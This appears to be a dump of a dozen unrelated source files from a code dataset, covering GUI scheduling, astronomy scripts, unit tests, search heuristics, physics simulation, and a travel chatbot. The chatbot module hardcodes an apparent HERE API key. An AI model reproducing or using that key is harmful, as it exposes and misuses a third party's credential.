+'\\n')\n self.rowCounter+=1 # incremented when new row needed\n else:\n self.columnCounter +=1\n self.meetingTime = (self.days[self.columnCounter]+ ': ' + self.times[self.rowCounter-1] + '\\n')\n self.relevantDate = self.updatedDates[self.columnCounter][0] + \" \" + str(self.updatedDates[self.columnCounter][1])\n\n if self.availability[i][e] == 'Y':\n self.button = tk.Label(self.timetableFrame, text = (self.meetingTime + self.relevantDate + '\\n\\n Available'), height = 8, width = 27,\n bg = self.colours[self.buttonCounter], wraplength = 225, justify = 'center', borderwidth = 2, relief = 'raised')\n self.button.bind('', partial(double_click, self.button))\n self.button.bind(\"\", partial(handle_enter, self.button)) # when the mouse hovers over\n self.button.bind(\"\", partial(handle_leave, self.button)) # when the mouse leaves\n\n else:\n self.button = tk.Label(self.timetableFrame, text = (self.meetingTime + self.relevantDate + '\\n\\n' + 'Unavailable'), height = 8, width = 27,\n bg = 'gray50', wraplength = 225, justify = 'center', borderwidth = 2, relief = 'raised')\n\n self.button.grid(row = self.rowCounter, column = self.columnCounter)\n self.buttonCounter += 1\n\n def returnHome(self):\n self.master.destroy()\n","sub_path":"Book_Hub.py","file_name":"Book_Hub.py","file_ext":"py","file_size_in_byte":8454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"392120704","text":"import os\nimport time\n\nimport argparse\n\nimport numpy\n\nfrom mangadap.util.log import init_DAP_logging, module_logging\nfrom mangadap.par.analysisplan import AnalysisPlanSet\nfrom mangadap.survey.dapall import DAPall\n\ndef parse_args(options=None, return_parser=False):\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--plan_file', type=str, help='parameter file with the MaNGA DAP '\n 'execution plan to use instead of the default' , default=None)\n parser.add_argument('--drpver', type=str, help='DRP version', default=None)\n parser.add_argument('-r', '--redux_path', type=str,\n help='Top-level directory with the DRP products; defaults to '\n '$MANGA_SPECTRO_REDUX/$MANGADRP_VER', default=None)\n parser.add_argument('--dapver', type=str, help='DAP version', default=None)\n parser.add_argument('-a', '--analysis_path', type=str,\n help='Top-level output directory for the DAP results; defaults to '\n '$MANGA_SPECTRO_ANALYSIS/$MANGADRP_VER/$MANGADAP_VER', default=None)\n parser.add_argument('-m', '--methods', type=str, nargs='+', default=None,\n help='Only include output from this DAP method designation in the output')\n parser.add_argument('-v', '--verbose', action='count',\n help='Set verbosity level; can be omitted and set up to -vv', default=0)\n parser.add_argument('--quiet', action='store_true', default=False,\n help='suppress all terminal output')\n parser.add_argument('--double', dest='single_precision', action='store_false', default=True,\n help='Output the floating-point data in double precision '\n '(default is single precision)')\n if return_parser:\n return parser\n\n return parser.parse_args() if options is None else parse.parse_args(options)\n\ndef main(args):\n t = time.perf_counter()\n analysisplan = AnalysisPlanSet.default() if args.plan_file is None \\\n else AnalysisPlanSet.from_par_file(args.plan_file)\n\n # Initialize the logging objects and start the log\n init_DAP_logging(None)#, simple_warnings=False)\n loggers = module_logging(__name__, args.verbose)\n\n DAPall(analysisplan, methods=args.methods, drpver=args.drpver, redux_path=args.redux_path,\n dapver=args.dapver, analysis_path=args.analysis_path, loggers=loggers, quiet=args.quiet,\n single_precision=args.single_precision)\n\n print('Elapsed time: {0} seconds'.format(time.perf_counter() - t))\n\n\n\n","sub_path":"mangadap/scripts/construct_dapall.py","file_name":"construct_dapall.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"23321764","text":"# Runtime 64 ms\n# Beats 98%\n# Definition for an interval.\n# class Interval:\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\nclass Solution:\n def merge(self, intervals):\n \"\"\"\n :type intervals: List[Interval]\n :rtype: List[Interval]\n \"\"\"\n intervals = sorted(intervals, key=lambda x: x.start)\n rst = list()\n\n for i in intervals:\n if not rst or rst[-1].end < i.start:\n rst.append(i)\n else:\n rst[-1].end = max(rst[-1].end, i.end)\n\n return rst\n\n\n# Note\n# 1. Remember to sort the list first.\n# Then several consecutive intervals can be merged into one interval.\n","sub_path":"56-Merge-Intervals/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"399950169","text":"import numpy as np\nimport pickle\nimport pytest\nfrom .testutil import datadir\nfrom brainstat.mesh.data import mesh_standardize\n\n\ndef dummy_test(infile, expfile):\n\n # load input test data\n ifile = open(infile, \"br\")\n idic = pickle.load(ifile)\n ifile.close()\n\n Y = idic[\"Y\"]\n\n mask = None\n subtractordivide = \"s\"\n\n if \"mask\" in idic.keys():\n mask = idic[\"mask\"]\n\n if \"subtractordivide\" in idic.keys():\n subtractordivide = idic[\"subtractordivide\"]\n\n # run mesh_standardize\n Y_out, Ym_out = mesh_standardize(Y, mask, subtractordivide)\n\n # load expected outout data\n efile = open(expfile, \"br\")\n expdic = pickle.load(efile)\n efile.close()\n Y_exp = expdic[\"Python_Y\"]\n Ym_exp = expdic[\"Python_Ym\"]\n\n testout = []\n\n testout.append(np.allclose(Y_out, Y_exp, rtol=1e-05, equal_nan=True))\n testout.append(np.allclose(Ym_out, Ym_exp, rtol=1e-05, equal_nan=True))\n\n assert all(flag == True for (flag) in testout)\n\n\n@pytest.mark.skip(reason=\"Function pending deprecation.\")\ndef test_01():\n # ['Y'] : np array, shape (1, 1), int64\n infile = datadir(\"statsta_01_IN.pkl\")\n expfile = datadir(\"statsta_01_OUT.pkl\")\n dummy_test(infile, expfile)\n\n\n@pytest.mark.skip(reason=\"Function pending deprecation.\")\ndef test_02():\n # ['Y'] : np array, shape (1, 10), int64\n # ['mask'] : np array, shape (10,), bool\n infile = datadir(\"statsta_02_IN.pkl\")\n expfile = datadir(\"statsta_02_OUT.pkl\")\n dummy_test(infile, expfile)\n\n\n@pytest.mark.skip(reason=\"Function pending deprecation.\")\ndef test_03():\n # ['Y'] : np array, shape (2, 10), int64\n # ['mask'] : np array, shape (10,), bool\n infile = datadir(\"statsta_03_IN.pkl\")\n expfile = datadir(\"statsta_03_OUT.pkl\")\n dummy_test(infile, expfile)\n\n\n@pytest.mark.skip(reason=\"Function pending deprecation.\")\ndef test_04():\n # ['Y'] : np array, shape (3, 4, 2), float64\n # ['mask'] : np array, shape (4,), bool\n infile = datadir(\"statsta_04_IN.pkl\")\n expfile = datadir(\"statsta_04_OUT.pkl\")\n dummy_test(infile, expfile)\n","sub_path":"brainstat/tests/test_mesh_standardize.py","file_name":"test_mesh_standardize.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"642743115","text":"\"\"\"\nFile: heuristics.py -- Dana Nau, Feb 14, 2018\n\nThis file contains three heuristic functions:\n- h_edist returns the Euclidean distance from (s) to the goal, ignoring walls;\n- h_esdist modifies h_edist to include an estimate of how long it will take to stop;\n- h_walldist computes the approximate distance to the goal without ignoring walls. \n\n Each heuristic function takes three arguments: state, edge, walls.\n state is the current state. It should have the form ((x,y), (u,v))\n edge is the finish line. It should have the form ((x1,y1), (x2,y2))\n walls is a list of walls, each wall having the form ((x1,y1), (x2,y2))\n\"\"\"\n\nimport racetrack, math\nimport sys # to get readline\n\n\ndef h_edist(state, edge, walls):\n \"\"\"Euclidean distance from state to edge, ignoring walls.\"\"\"\n (x, y) = state[0]\n ((x1, y1), (x2, y2)) = edge\n\n # find the smallest and largest coordinates\n xmin = min(x1, x2)\n xmax = max(x1, x2)\n ymin = min(y1, y2)\n ymax = max(y1, y2)\n\n return min([math.sqrt((xx - x) ** 2 + (yy - y) ** 2)\n for xx in range(xmin, xmax + 1) for yy in range(ymin, ymax + 1)])\n\n\ndef h_esdist(state, fline, walls):\n \"\"\"\n h_edist modified to include an estimate of how long it will take to stop.\n \"\"\"\n ((x, y), (u, v)) = state\n m = math.sqrt(u ** 2 + v ** 2)\n stop_dist = m * (m - 1) / 2.0\n return max(h_edist(state, fline, walls) + stop_dist / 10.0, stop_dist)\n\n\n# Global variables for h_walldist\n\n# in Python 3 we can just use math.inf, but that doesn't work in Python 2\ninfinity = float('inf')\n\ng_fline = False\ng_walls = False\ngrid = []\n\n\ndef h_walldist(state, fline, walls):\n \"\"\"\n The first time this function is called, for each gridpoint that's not inside a wall\n it will cache a rough estimate of the length of the shortest path to the finish line.\n The computation is done by a breadth-first search going backwards from the finish \n line, one gridpoint at a time.\n \n On all subsequent calls, this function will retrieve the cached values and add an\n estimate of how long it will take to stop. \n \"\"\"\n global g_fline, g_walls\n if fline != g_fline or walls != g_walls or grid == []:\n edist_grid(fline, walls)\n ((x, y), (u, v)) = state\n hval = float(grid[x][y])\n\n # add a small penalty to favor short stopping distances\n au = abs(u)\n av = abs(v)\n sdu = au * (au - 1) / 2.0\n sdv = av * (av - 1) / 2.0\n sd = max(sdu, sdv)\n penalty = sd / 10.0\n\n # compute location after fastest stop, and add a penalty if it goes through a wall\n if u < 0: sdu = -sdu\n if v < 0: sdv = -sdv\n sx = x + sdu\n sy = y + sdv\n if racetrack.crash([(x, y), (sx, sy)], walls):\n penalty += math.sqrt(au ** 2 + av ** 2)\n hval = max(hval + penalty, sd)\n return hval\n\n\ndef edist_grid(fline, walls):\n global grid, g_fline, g_walls, xmax, ymax\n xmax = max([max(x, x1) for ((x, y), (x1, y1)) in walls])\n ymax = max([max(y, y1) for ((x, y), (x1, y1)) in walls])\n grid = [[edistw_to_line((x, y), fline, walls) for y in range(ymax + 1)] for x in range(xmax + 1)]\n flag = True\n print('computing edist grid', end=' ')\n sys.stdout.flush()\n while flag:\n print('.', end='')\n sys.stdout.flush()\n flag = False\n for x in range(xmax + 1):\n for y in range(ymax + 1):\n for y1 in range(max(0, y - 1), min(ymax + 1, y + 2)):\n for x1 in range(max(0, x - 1), min(xmax + 1, x + 2)):\n if grid[x1][y1] != infinity and not racetrack.crash(((x, y), (x1, y1)), walls):\n if x == x1 or y == y1:\n d = grid[x1][y1] + 1\n else:\n d = grid[x1][y1] + 1.4142135623730951\n if d < grid[x][y]:\n grid[x][y] = d\n flag = True\n print(' done')\n g_fline = fline\n g_walls = walls\n return grid\n\n\ndef edistw_to_line(point, edge, walls):\n \"\"\"\n straight-line distance from (x,y) to the line ((x1,y1),(x2,y2)).\n Return infinity if there's no way to do it without intersecting a wall\n \"\"\"\n # if min(x1,x2) <= x <= max(x1,x2) and min(y1,y2) <= y <= max(y1,y2):\n # return 0\n (x, y) = point\n ((x1, y1), (x2, y2)) = edge\n if x1 == x2:\n ds = [math.sqrt((x1 - x) ** 2 + (y3 - y) ** 2) \\\n for y3 in range(min(y1, y2), max(y1, y2) + 1) \\\n if not racetrack.crash(((x, y), (x1, y3)), walls)]\n else:\n ds = [math.sqrt((x3 - x) ** 2 + (y1 - y) ** 2) \\\n for x3 in range(min(x1, x2), max(x1, x2) + 1) \\\n if not racetrack.crash(((x, y), (x3, y1)), walls)]\n ds.append(infinity)\n return min(ds)\n\n\ndef distance(p1, p2):\n (x1, y1) = p1\n (x2, y2) = p2\n return math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)\n","sub_path":"part2/heuristics.py","file_name":"heuristics.py","file_ext":"py","file_size_in_byte":4917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"147965655","text":"import unittest\nfrom datetime import timedelta\nfrom chess import Board, WHITE, BLACK\nimport rom.util\nfrom hydraChess.models import User, Game\nfrom hydraChess.config import TestingConfig\n\n\nclass TestGame(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n rom.util.set_connection_settings(db=TestingConfig.REDIS_DB_ID)\n\n def setUp(self):\n self.used_game_ids = list()\n self.used_user_ids = list()\n\n def test_total_time_and_black_clock_and_white_clock(self):\n game = Game()\n game.save()\n self.used_game_ids.append(game.id)\n\n total_time = timedelta(seconds=30, microseconds=13231)\n game.total_time = total_time\n black_clock = timedelta(seconds=310, microseconds=321312)\n game.black_clock = black_clock\n white_clock = timedelta(seconds=312, microseconds=31231)\n game.white_clock = white_clock\n\n game.save()\n game.refresh()\n\n self.assertEqual(game.total_time, total_time)\n self.assertEqual(game.black_clock, black_clock)\n self.assertEqual(game.white_clock, white_clock)\n\n def test_moves(self):\n game = Game()\n game.save()\n self.used_game_ids.append(game.id)\n\n moves = ['e4', 'e5', 'Nf3', 'Nc6']\n game.moves = moves\n game.save()\n game.refresh()\n\n self.assertEqual(game.moves, moves)\n\n def test_moves_cnt_and_next_to_move_and_append_move(self):\n game = Game()\n game.save()\n self.used_game_ids.append(game.id)\n\n moves = ['e4', 'e5', 'Nf3', 'Nc6']\n\n next_to_move = WHITE\n\n for i in range(len(moves)):\n self.assertEqual(game.get_moves_cnt(), i)\n self.assertEqual(game.get_next_to_move(), next_to_move)\n\n game.append_move(moves[i])\n if next_to_move == WHITE:\n next_to_move = BLACK\n else:\n next_to_move = WHITE\n\n self.assertEqual(game.get_next_to_move(), next_to_move)\n self.assertEqual(game.get_moves_cnt(), len(moves))\n self.assertEqual(game.moves, moves)\n\n def test_get_board(self):\n game = Game()\n game.save()\n self.used_game_ids.append(game.id)\n\n moves = ['e4', 'e5', 'Nf3', 'Nc6']\n\n expected_board = Board()\n for move in moves:\n expected_board.push_san(move)\n\n game.moves = moves\n game.save()\n game.refresh()\n\n self.assertEqual(game.get_board(), expected_board)\n\n def tearDown(self):\n for game_id in self.used_game_ids:\n game = Game.get(game_id)\n game.delete()\n self.used_game_ids.clear()\n\n for user_id in self.used_user_ids:\n user = User.get(user_id)\n user.delete()\n self.used_user_ids.clear()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"196953992","text":"from vpython import *\r\ng = vec(0, -9.8 ,0) # g = 9.8 m/s^2\r\nsize = 0.215 /2 # ball radius = 0.25 m\r\nweight = 0.45 #ball weight\r\nCd = 0.47 #drag coefficient\r\nCm = 0.40 #magnus coefficient\r\nCw = 0.08 #rotational friction coefficient\r\nrpm = 240 #initial rpm\r\ndensity = 1.293\r\nviscosity = 1.81E-5\r\nv = vec(18, 9, 0)\r\nomega = rpm/60*2*pi*norm(vec(0,1,0)) #initial omega \r\nSP = size*mag(omega)/mag(v) #dimension less angular velocity\r\n\r\nclass soccer():\r\n def __init__(self, size, pos, v, rpm ,omega):\r\n self.o = sphere(radius = size, make_trail = True, trail_radius = 0.05, trail_type=\"points\",\r\n pos=pos, interval=10, texture='Soccer-ball-Texture1.jpg') \r\n self.o.v = v\r\n self.omega = omega\r\n self.radius = size\r\n self.stop = False\r\n self.rpm = rpm\r\n self.slab = label(pos= pos + vec(0,2,0), box = True)\r\n\r\ndef drag_torque(Cw, density, omega, radius):\r\n return -Cw * density/2 * (radius**5) * mag(omega) * omega\r\n\r\ndef drag_force(Cd, density, velocity, radius):\r\n return -1/2 * density * Cd * (pi*radius**2) * mag(velocity) * velocity\r\n\r\ndef magnus_force(Cm, radius, omega, velocity):\r\n return 4/3*pi*(radius**3) * (Cm*density*cross(omega,velocity))\r\n\r\n\r\nscene = canvas(width=1000, height=500, center =vec(0,0,0), background=vec(0.5,0.5,0)) # open a window\r\nfloor = box(length=40, height=0.01, width=30, color=color.blue) # the floor\r\nballs = []\r\nfor i in range(-2,6):\r\n rpm = 0 + 250*i\r\n ball = soccer(size, vec(-20, size ,0), v, rpm, rpm/60*2*pi*norm(vec(0,0,1)))\r\n balls.append(ball)\r\nstops = [False]*10\r\nscene.center = balls[4].o.pos + vec(0,2,0)\r\ndt = 0.001\r\n\r\nwhile True:\r\n rate(200)\r\n for ball in balls:\r\n if ball.o.pos.y >= ball.radius:\r\n ball.o.pos += ball.o.v*dt\r\n ball.o.v += ( drag_force(Cd, density, ball.o.v, ball.radius)/weight + magnus_force(Cm, ball.radius, ball.omega, ball.o.v)/weight + g )*dt\r\n I = 2/3*weight*ball.radius**2\r\n ball.omega += drag_torque(Cw, density, ball.omega, ball.radius)/I *dt\r\n ball.o.rotate(angle=mag(ball.omega)*dt, axis=ball.omega, origin=ball.o.pos)\r\n ball.slab.pos = ball.o.pos + vec(0,1,0)\r\n ball.slab.text = str('w:%3.0frpm'%ball.rpm)\r\n else:\r\n ball.stop = True\r\n scene.center = balls[4].o.pos + vec(0,2,0)\r\n \r\n for ball in balls:\r\n if ball.stop == False:\r\n break\r\n else:\r\n break\r\n\r\nfor ball in balls:\r\n origin = vec(-20, 0, 0)\r\n print(\"ball's rpm: %d, shift: %2.3f\"%( ball.rpm, mag(ball.o.pos - balls[3].o.pos) ))\r\n\r\n\r\n\r\n\r\n","sub_path":"physics_hw/project/magnus_omega.py","file_name":"magnus_omega.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"601908780","text":"print(\"--IMPERATIVE\")\ncpt = 0 # global state\n\ndef count_calls():\n global cpt\n cpt += 1\n print(\"calls : {}\".format(cpt))\n\ncount_calls() # calls : 1\ncount_calls() # calls : 2\n\nprint(\"--FUNCTIONAL\")\ndef count_calls(cpt):\n new_cpt = cpt + 1\n return new_cpt\n\ncpt1 = 0\ncpt2 = count_calls(cpt1)\nprint(\"calls : {}\".format(cpt2)) # calls : 1\ncpt3 = count_calls(cpt2)\nprint(\"calls : {}\".format(cpt3)) # calls : 2\n\n\nfrom enum import Enum\n\nclass Color(Enum):\n BLACK = 1\n WHITE = 2\n\n def __repr__(self):\n return Color.STRINGS[self.value]\n\n# One peculiarity of Enums, static variables must be defined outside\n# the class\nColor.STRINGS = { 1: \"B\", 2: \"W\" }\n\nclass Board():\n # One peculiarity of keyword args, that they are references\n # defined once and for all. You must not copy them for fear of\n # strange aliasing results.\n def __init__(self, moves = None):\n if (moves is None):\n self.moves = []\n else:\n self.moves = moves\n\n def __repr__(self):\n return \"moves={}\".format(self.moves)\n\n def get_move(self, color):\n old_moves = [ m[0] for m in self.moves ]\n if old_moves == []:\n return [1, color]\n else:\n return [max(old_moves) + 1, color]\n\nprint(\"--IMPERATIVE\")\nglobal_board = Board() # global state\n\ndef play(board, color):\n m = board.get_move(color)\n # Modify board 'in place'\n board.moves.append(m)\n\nprint(Color.WHITE)\nplay(global_board, Color.WHITE)\nplay(global_board, Color.BLACK)\nprint(global_board)\n\nprint(\"--FUNCTIONAL\")\ndef play(board, color):\n m = board.get_move(color)\n # Return new independent board\n return Board(moves = \\\n board.moves + [m])\n\nboard1 = Board()\nboard2 = play(board1, Color.WHITE)\nboard3 = play(board2, Color.BLACK)\nprint(board1)\nprint(board2)\nprint(board3)\n\ndef play_rec(board, n):\n print(board)\n if (n == 0):\n return board\n else:\n next_board = play(play(board, Color.WHITE), Color.BLACK)\n return play_rec(next_board, n-1)\n\nplay_rec(board1, 10)\n","sub_path":"prog/prog/codes/intro/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"637171409","text":"from .root import app \nimport random\n\n@app.handle(intent='greet')\ndef welcome(request, responder):\n responder.frame['state'] = \"get_destination_or_preferences\"\n welcomes = random.choice([\"Hi!\", \"Hello!\", \"Hey There!\", \"Yo!\", \"Namaste!\", \"Namaskar!\"])\n # can_ask = random.choice([\"more about some places to visit.\", \"about food and cuisine.\", \"directions.\", \"about the best places to visit\"])\n can_ask = \" You can tell me where you want to go or what you want to experience, and I'll find something for you!\"\n prefix = \" I am Sara, your virtual travel assistant! I'm here to help you plan your next visit to India.\"\n responder.reply(welcomes+prefix+can_ask)\n\n@app.handle(intent='help')\ndef provide_help(request, responder):\n \"\"\"\n When the user asks for help, provide some sample queries they can try.\n \"\"\"\n # Respond with examples demonstrating how the user can order food from different restaurants.\n # For simplicity, we have a fixed set of demonstrative queries here, but they could also be\n # randomly sampled from a pool of example queries each time.\n replies = [\"I can help you explore the real India! Try asking me about the best places to visit\"]\n responder.reply(replies)\n\n@app.handle(intent='start_over')\ndef start_over(request, responder):\n \"\"\"\n When the user wants to start over, clear the dialogue frame and reply for the next request.\n \"\"\"\n if(responder.frame.get('state') == 'ask_user_for_local_culture'):\n responder.frame['state'] = 'suggest_hotels'\n destination = responder.frame.get('destination')\n hotels = _get_poi_from_name(origin=destination, poi='hotels', limit='3')\n responder.slots['hotels'] = \"\\n\".join(hotels)\n responder.slots['destination'] = destination\n responder.reply(\"Cool. Alternatively, here are some hotels at {destination}:\\n{hotels}\")\n return\n\n if(responder.frame.get('state') == 'confirm_for_local_culture'):\n responder.frame['state'] = 'suggest_hotels'\n responder.params.target_dialogue_state = 'send_accomodation'\n destination = responder.frame.get('destination')\n hotels = _get_poi_from_name(origin=destination, poi='hotels', limit='3')\n responder.slots['hotels'] = \"\\n\".join(hotels)\n responder.slots['destination'] = destination\n responder.reply(\"Cool. Alternatively, here are some hotels at {destination}:\\n{hotels}\")\n \n else:\n # Clear the dialogue frame and respond with a variation of the welcome message.\n responder.frame = {}\n replies = [\"Ok, let's start over!\"]\n responder.reply(replies)\n responder.listen()\n\n@app.handle(intent='exit')\ndef say_goodbye(request, responder):\n \"\"\"\n When the user ends a conversation, clear the dialogue frame and say goodbye.\n \"\"\"\n # Clear the dialogue frame to start afresh for the next user request.\n responder.frame = {}\n # Respond with a random selection from one of the canned \"goodbye\" responses.\n responder.reply(['Bye!', 'Goodbye!', 'Have a nice day.', 'See you later.'])\n \n@app.handle(intent='unsupported')\ndef say_unsupported(request, responder):\n \"\"\"\n When the user asks an unrelated question, convey the lack of understanding for the requested\n information and prompt to return to food ordering.\n \"\"\"\n replies = [\"Sorry, I can't answer this right away! My creators are still working on this :)\"]\n responder.reply(replies)\n\n\nimport requests, json\napiKey = 'x_QwMrXk6NkNWpdkZzTsEH1JyzETot06I-FNTd4Ur6Y'\n\ndef _get_transit_from_geocode(origin, destination):\n \"\"\"\n This fucntion will take origin and destination as string [lat,long] & [lat, long] param\n and return a json if all went good else return False\n \"\"\"\n transit_url = 'https://transit.router.hereapi.com/v8/routes?apiKey='+apiKey\n transit_location = '&origin='+origin+'&destination='+destination\n response = requests.get(transit_url + transit_location)\n if(response.status_code == 200):\n return response.json()\n else:\n return False\n\ndef _get_geocode(origin, format='ll'):\n \"\"\"\n This function will take a location as string param\n and return a geocode string if all went good else return False\n \"\"\"\n geocode_url = 'https://geocode.search.hereapi.com/v1/geocode?apiKey='+apiKey\n geocode_location = '&q='+ origin\n response = requests.get(geocode_url + geocode_location)\n try:\n if(response.status_code == 200):\n response = response.json()['items'][0]\n if(format == 'll'):\n return str(response['position']['lat'])+\",\"+str(response['position']['lng'])\n elif(format == 'lat'):\n return str(response['position']['lat'])\n elif(format == 'lon'):\n return str(response['position']['lng'])\n else:\n return False\n else:\n return False\n except:\n return False\n\ndef _get_poi_from_geocode(origin, poi='tourism', limit='3'):\n \"\"\"\n This function takes lat,long as comma seperated string param.\n poi or point of interest as string, defaults to tourism\n limit or number of results expected, defaults to 3\n and returns list if all went good else return False\n \"\"\"\n discover_url = 'https://discover.search.hereapi.com/v1/discover?apiKey='+apiKey\n discover_location = '&limit='+limit+'&q='+poi+'&at='+origin\n\n response = requests.get(discover_url + discover_location)\n if(response.status_code == 200):\n response = response.json()['items']\n return response\n else:\n return False\n\ndef _get_poi_from_name(origin, poi='tourism', limit = '3'):\n \"\"\"\n This method takes origin as name string\n poi as string (defaults to tourism)\n limit as string (defaults to 3)\n and returns a list with details of said POIs with length = limit\n return defaults to False\n \"\"\"\n # get geocode first\n geo_code = _get_geocode(origin)\n if(geo_code):\n pass\n else:\n return False\n # get the pois using geo code\n poi = _get_poi_from_geocode(geo_code, poi = poi, limit = limit)\n if(poi):\n pass\n else:\n return False\n items = []\n for one_item in poi:\n title = one_item['address']['label']\n try:\n contact = (\"Contact: \" + one_item['contacts'][0]['phone'][0]['value'] + \" | Website: \" + one_item['contacts'][0]['www'][0]['value']) \n title = (title+'\\n'+contact)\n items.append(title)\n except:\n items.append(title)\n if(items):\n return items\n else:\n return False\n\ndef _get_transit_from_name(origin, destination):\n try:\n origin_gc = _get_geocode(origin)\n destination_gc = _get_geocode(destination)\n route = _get_transit_from_geocode(origin=origin_gc, destination=destination_gc)\n sections = (route['routes'][0]['sections'])\n directions = []\n for section in sections:\n try:\n mode = section['transport']['mode'].title()\n from_l = section['departure']['place']['name'].title() + \" (\" + section['departure']['place']['type'].title()+\")\"\n to_l = section['arrival']['place']['name'].title() + \" (\" + section['arrival']['place']['type'].title()+\")\"\n except:\n mode = section['transport']['mode'].title()\n from_l = origin.title() + \" (\"+ section['departure']['place']['type'].title()+\")\"\n to_l = destination.title()+ \" (\" +section['arrival']['place']['type'].title()+\")\"\n directions.append(mode+'\\n'+from_l+ ' to '+to_l)\n return directions\n except:\n # return (route['notices'][0]['title'])\n return False\n\ndef _get_routes_from_geocode(origin, destination, transportMode='car'):\n \"\"\"\n This method takes origin and destination as string of lat,lng as parameter\n and returns list of directions\n \"\"\"\n routes_url = 'https://router.hereapi.com/v8/routes?apiKey='+apiKey\n routes_location = '&transportMode='+ transportMode+'&origin='+origin+'&destination='+destination\n response = requests.get(routes_url + routes_location)\n if(response.status_code == 200):\n return response.json()\n else:\n return False\n\ndef _get_routes_from_name(origin, destination):\n try:\n origin_gc = _get_geocode(origin)\n destination_gc = _get_geocode(destination)\n route = _get_routes_from_geocode(origin=origin_gc, destination=destination_gc)\n sections = (route['routes'][0]['sections'])\n directions = []\n for section in sections:\n try:\n mode = section['transport']['mode'].title()\n from_l = section['departure']['place']['name'].title() + \" | \" + section['departure']['place']['type'].title()\n to_l = section['arrival']['place']['name'].title() + \"|\" + section['arrival']['place']['type'].title()\n except:\n mode = section['transport']['mode'].title()\n from_l = origin.title() + \" (\"+ section['departure']['place']['type'].title()+\")\"\n to_l = destination.title()+ \" (\" +section['arrival']['place']['type'].title()+\")\"\n directions.append(mode+\"\\n\"+from_l+ \" to \"+to_l)\n return directions\n except:\n # return (route['notices'][0]['title'])\n return False\n\n","sub_path":"d_general.py","file_name":"d_general.py","file_ext":"py","file_size_in_byte":9432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"52627408","text":"'''\nGiven a word w, a good subsequence of w is defined as a word w' such that\n- all letters in w' are different;\n- w' is obtained from w by deleting some letters in w.\n\nReturns the list of all good subsequences, without duplicates, in lexicographic order\n(recall that the sorted() function sorts strings in lexicographic order).\n\nThe number of good sequences grows exponentially in the number of distinct letters in w,\nso the function will be tested only for cases where the latter is not too large.\n\n'''\n\n\ndef good_subsequences(word):\n '''\n >>> good_subsequences('')\n ['']\n >>> good_subsequences('aaa')\n ['', 'a']\n >>> good_subsequences('aaabbb')\n ['', 'a', 'ab', 'b']\n >>> good_subsequences('aaabbc')\n ['', 'a', 'ab', 'abc', 'ac', 'b', 'bc', 'c']\n >>> good_subsequences('aaabbaaa')\n ['', 'a', 'ab', 'b', 'ba']\n >>> good_subsequences('abbbcaaabccc')\n ['', 'a', 'ab', 'abc', 'ac', 'acb', 'b', 'ba', 'bac',\\\n 'bc', 'bca', 'c', 'ca', 'cab', 'cb']\n >>> good_subsequences('abbbcaaabcccaaa')\n ['', 'a', 'ab', 'abc', 'ac', 'acb', 'b', 'ba', 'bac',\\\n 'bc', 'bca', 'c', 'ca', 'cab', 'cb', 'cba']\n >>> good_subsequences('abbbcaaabcccaaabbbbbccab')\n ['', 'a', 'ab', 'abc', 'ac', 'acb', 'b', 'ba', 'bac',\\\n 'bc', 'bca', 'c', 'ca', 'cab', 'cb', 'cba']\n '''\n # Insert your code here\n if not word:\n return ['']\n first_word = word[0]\n output = []\n last_list = good_subsequences(word[1: ])\n for w in last_list:\n output.append(w)\n if not first_word in w:\n output.append(first_word + w)\n output = sorted(list(set(output)))\n #print(output)\n return output\n \n \n \n\n \n \n\n# Possibly define another function\n \n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"Final/Sample/sample_3.py","file_name":"sample_3.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"433804549","text":"import falcon\n\nfrom .handler import MetaDataHandler, UserDataHandler, StaticFileHandler\n\n\nclass RestApi(falcon.API):\n \"\"\"Falcon API service definition for this application\n\n \"\"\"\n def __init__(self, routes: dict, **kwargs):\n super(__class__, self).__init__(**kwargs)\n for route, handler in routes.items():\n self.add_route(route, handler)\n if \"/\" not in routes.keys():\n # add thin api overview handler\n self.add_route(\"/\", self)\n self.routes = routes\n\n def on_get(self, req: falcon.Request, resp: falcon.Response):\n r = self.routes.keys()\n resp.content_type = \"text/plain\"\n resp.body = \"{response_data}\\n\".format(response_data=\"\\n\".join(r))\n\ndef init_service():\n routes = {\n \"/meta-data\": MetaDataHandler(),\n \"/user-data\": UserDataHandler(),\n \"/static/{filename}\": StaticFileHandler(),\n }\n return RestApi(routes)\n","sub_path":"code/ccs/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"17272936","text":"import tg\nfrom tg import expose\nfrom tg import tmpl_context\nfrom preview_generator.exception import PreviewGeneratorException\nfrom preview_generator.manager import PreviewManager\n\nfrom tracim.config.app_cfg import CFG\nfrom tracim.controllers import TIMRestController\nfrom tracim.lib.content import ContentApi\nfrom tracim.model.data import ContentType\n\n__all__ = ['PagesController']\n\n\nclass PagesController(TIMRestController):\n\n 